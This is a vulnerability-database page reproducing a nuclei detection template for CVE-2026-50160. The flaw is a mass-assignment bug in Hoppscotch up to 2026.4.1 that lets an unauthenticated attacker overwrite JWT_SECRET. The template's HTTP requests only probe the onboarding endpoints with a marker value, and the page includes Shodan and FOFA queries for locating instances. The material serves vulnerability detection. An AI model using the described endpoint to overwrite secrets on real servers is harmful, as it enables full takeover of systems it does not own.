Lucene search
+L

Hoppscotch <= 2026.4.1 - Mass Assignment JWT_SECRET Overwrite

🗓️ 13 Aug 2026 08:19:47Reported by ProjectDiscoveryType 
nuclei
 nuclei
🔗 github.com👁 3 Views

Mass assignment in Hoppscotch <= 2026.4.1 lets unauthenticated attackers overwrite JWT_SECRET and fully compromise the server.

Related
Refs
Code
id: CVE-2026-50160

info:
  name: Hoppscotch <= 2026.4.1 - Mass Assignment JWT_SECRET Overwrite
  author: str4k3r
  severity: critical
  description: |
    Hoppscotch self-hosted backend <= 2026.4.1 contains a broken authentication caused by mass assignment via unauthenticated POST /v1/onboarding/config endpoint, letting unauthenticated attackers overwrite JWT_SECRET to forge tokens and fully compromise the server, exploit requires attacker to access fresh instance before onboarding completes or when no users exist.
  impact: |
    Unauthenticated attackers can forge JWT tokens and fully compromise the server, including administrator access.
  remediation: |
    Update to version 2026.5.0 or later.
  reference:
    - https://github.com/hoppscotch/hoppscotch/security/advisories/GHSA-j542-4rch-8hwf
    - https://nvd.nist.gov/vuln/detail/CVE-2026-50160
    - https://github.com/hoppscotch/hoppscotch/pull/6171
  classification:
    cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:C/C:H/I:H/A:N
    cvss-score: 10.0
    cve-id: CVE-2026-50160
    cwe-id: CWE-915
  metadata:
    verified: true
    max-request: 2
    vendor: hoppscotch
    product: hoppscotch
    shodan-query: http.title:"Hoppscotch"
    fofa-query: title="Hoppscotch"
  tags: cve,cve2026,hoppscotch,mass-assignment,jwt

flow: http(1) && http(2)

http:
  - raw:
      - |
        GET /v1/onboarding/status HTTP/1.1
        Host: {{Hostname}}
        Accept: application/json

    matchers:
      - type: dsl
        dsl:
          - 'status_code == 200'
          - 'contains(body, "canReRunOnboarding")'
          - 'contains(body, "\"onboardingCompleted\":false") || contains(body, "\"canReRunOnboarding\":true")'
        condition: and
        internal: true

  - raw:
      - |
        POST /v1/onboarding/config HTTP/1.1
        Host: {{Hostname}}
        Content-Type: application/json
        Accept: application/json

        {"CVE_2026_50160_DETECT":"true"}

    matchers:
      - type: dsl
        dsl:
          - 'status_code == 400'
          - 'contains(body, "VITE_ALLOWED_AUTH_PROVIDERS")'
          - '!contains(body, "should not exist")'
        condition: and
# digest: 4a0a00473045022100e75338fdf15a4ab7d4d1ca3c5c5a0ebc82a6c779fc5890f14655f4c2ec3eb9d802205741646441941851b01efb31e7dd88e26c72f08409ebfaa9fba256e00af8619c:922c64590222798bb761d5b6d8e72950

Data

Build on a solid foundation with Vulners data

We provide the essential building blocks for cybersecurity solutions with comprehensive, structured, and constantly updated vulnerability and exploits data

Api

Power your application with Vulners API

The Vulners REST API offers reliable, high-performance access to vulnerability intelligence, with 99.9% SLA uptime and CDN-backed data delivery for seamless global access

App

Assess and manage vulnerabilities with Vulners tools

Built on top of Vulners' database and SDK, end-user solutions give security professionals and developers lightweight and powerful tools for vulnerability remediation

08 Aug 2026 21:10Current
5.7Medium risk
Vulners AI Score5.7
CVSS 3.110
EPSS0.08603
SSVC
3